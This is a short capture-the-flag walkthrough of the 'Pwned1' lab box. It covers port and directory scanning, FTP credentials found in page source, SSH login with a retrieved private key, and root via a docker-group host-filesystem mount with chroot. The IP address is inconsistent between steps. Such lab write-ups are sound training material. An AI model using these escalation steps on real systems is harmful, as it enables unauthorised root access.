Pwned1 Walkthrough (Proving Grounds) — Root Access via FTP and Docker Privilege Escalation

NIkhil Kumar
3 min readOct 29, 2024

--

This guide provides a walkthrough for the “Pwned1” box, focusing on reconnaissance, enumeration, exploitation, and privilege escalation to root using FTP credentials and Docker. Let’s dive in.

Step 1: Initial Scanning with Nmap

Start by scanning the target IP (192.168.172.95) for open ports:

nmap 192.168.172.95

The scan reveals that ports 21 (FTP), 22 (SSH), and 80 (HTTP) are open. To gather further information on these ports, use the following command:

sudo nmap -p 21,22,80 192.168.172.95 -sC -sV -O -o nmap_scan.txt

Scan Results:

21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))

The HTTP title on port 80 reads “Pwned….!!”, which hints at potential clues or content for further exploration.

Step 2: Web Directory Enumeration with Gobuster

To discover hidden directories on the web server, run a Gobuster scan:

gobuster dir -u http://192.168.172.95/ -w common.txt -t 50

Gobuster Results:

/index.html
/robots.txt
/hidden_text/secret.dic

/pwned.vuln

The robots.txt file contains the following:

User-agent: *
Allow: /nothing
Allow: /hidden_text

Inside /hidden_text, there’s a secret.dic file with additional directories, including /pwned.vuln.

Step 3: FTP Credentials Discovery

Upon inspecting the source code of `http://192.168.172.95/pwned.vuln`, we find FTP credentials in the comments:

// if ($un==’ftpuser’ && $pw==’B0ss_Pr!ncesS’) {

Step 4: FTP Login and File Retrieval

Login to the FTP server using these credentials:

ftp 192.168.214.95

Navigate through the directories and find “id_rsa” (an SSH private key) and “note.txt”. Download these files to your local machine for further analysis.

Setting permissions for id_rsa

chmod 600 id_rsa

Reading note.txt

cat note.txt

The note reveals a potential user, “Ariana.” Use the “id_rsa” file to attempt an SSH connection as “Ariana.”

Step 5: SSH Login and Shell Stabilization

ssh -i id_rsa ariana@192.168.214.95

User flag here /^\

Once logged in, stabilize the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 6: Privilege Escalation via Docker

Check the `id` command to see group memberships:

id

If “Ariana” is part of the “docker” group, this allows for potential privilege escalation. List available Docker images:

docker images

Run a Docker container with “chroot” to access the root filesystem:

docker run -v /:/mnt - rm -it alpine chroot /mnt sh
python3 -c 'import pty; pty.spawn("/bin/bash")'

Final Steps: Accessing Root Files

With root access, navigate to the root directory:

cd /root/
ls
cat root.txt
cat proof.txt

Congratulations! You’ve achieved root access and retrieved the flags.

--

--

NIkhil Kumar

Cybersecurity enthusiast with skills in penetration testing, vulnerability assessment, and Python. Passionate about strengthening security protocols